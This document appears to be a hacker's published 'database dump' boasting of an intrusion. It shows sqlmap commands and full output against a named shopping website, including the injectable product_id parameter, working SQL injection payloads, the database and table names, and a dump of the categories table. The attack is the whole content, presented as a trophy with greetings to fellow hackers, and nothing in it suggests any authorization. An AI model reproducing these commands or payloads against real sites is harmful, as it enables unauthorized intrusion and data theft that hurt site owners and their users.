Database: buy-a.co.uk Published by JM511

Published by JM511
Follow me : www.twitter.com/JM511
From : Saudi Arabia
Greeting to : #in3ctor , Shi5-AlHacker , Dr.ExE , Zombie_KsA , Nok511 , Virus511 ,ALM511 , Sarbot511
====================

Database of : www.buy-a.co.uk
=====================

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.buy-a.co.uk/product.php?product_id=7115 -D adstorm_buya --tables

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:39:02

[14:39:02] [INFO] resuming back-end DBMS 'mysql'
[14:39:05] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: product_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: product_id=7115 AND 3617=3617

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: product_id=7115 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6d6b6d3a,0x456d7a42416b6f677547,0x3a6d72783a)--

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: product_id=7115 AND SLEEP(5)
---

[14:39:11] [INFO] the back-end DBMS is MySQL

web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
[14:39:11] [INFO] fetching tables for database: 'adstorm_buya'
Database: adstorm_buya
[3 tables]
+----------------+
| categories     |
| product_groups |
| products       |
+----------------+

[14:39:15] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.buy-a.co.uk'

[*] shutting down at 14:39:15

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.buy-a.co.uk/product.php?product_id=7115 -D adstorm_buya --dump

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:39:22

[14:39:22] [INFO] resuming back-end DBMS 'mysql'
[14:39:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: product_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: product_id=7115 AND 3617=3617

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: product_id=7115 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6d6b6d3a,0x456d7a42416b6f677547,0x3a6d72783a)--

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: product_id=7115 AND SLEEP(5)
---

[14:39:31] [INFO] the back-end DBMS is MySQL

web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
[14:39:31] [INFO] fetching tables for database: 'adstorm_buya'
[14:39:31] [INFO] fetching columns for table 'categories' in database 'adstorm_buya'
[14:39:35] [INFO] fetching entries for table 'categories' in database 'adstorm_buya'
[14:39:39] [INFO] analyzing table dump for possible password hashes
Database: adstorm_buya
Table: categories
[9 entries]
+----+----------------------+
| ID | Category             |
+----+----------------------+
| 1  | Electrical           |
| 2  | Computing            |
| 3  | Photographic         |
| 4  | Book                 |
| 5  | DIY                  |
| 6  | Gift                 |
| 7  | Household            |
| 8  | Books & Magazines    |
| 9  | Consumer Electronics |
+----+----------------------+